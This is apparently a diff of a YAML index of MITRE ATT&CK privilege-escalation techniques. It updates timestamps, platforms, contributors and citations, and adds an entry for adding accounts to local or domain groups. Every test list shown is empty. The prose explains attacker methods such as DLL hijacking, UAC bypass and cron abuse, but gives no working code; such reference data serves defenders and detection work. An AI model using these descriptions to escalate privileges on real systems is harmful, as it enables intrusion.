-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15617,7 +15885,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15640,11 +15908,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15702,14 +15969,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15810,7 +16076,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -15841,7 +16106,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -15875,13 +16140,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -15900,7 +16163,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -15914,7 +16176,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -15941,8 +16202,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -15973,12 +16234,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16050,9 +16312,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16068,12 +16330,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16148,12 +16409,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16173,9 +16433,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16195,9 +16460,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16214,6 +16478,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16247,7 +16515,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -16403,31 +16670,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16444,6 +16691,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16454,9 +16702,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16464,13 +16716,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16500,6 +16768,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16510,6 +16779,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16518,13 +16788,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16566,9 +16836,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -16636,19 +16903,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -16664,8 +16930,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16679,7 +16945,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -16705,6 +16971,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -16732,12 +17002,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16763,7 +17032,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -16805,7 +17074,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -16883,11 +17151,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -16967,7 +17234,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -16990,7 +17327,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17038,8 +17375,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17071,7 +17406,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17126,13 +17461,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17193,9 +17526,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17204,7 +17537,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17257,7 +17589,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17278,12 +17610,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17386,7 +17717,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17486,12 +17816,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17504,7 +17833,6 @@ privilege-escalation:
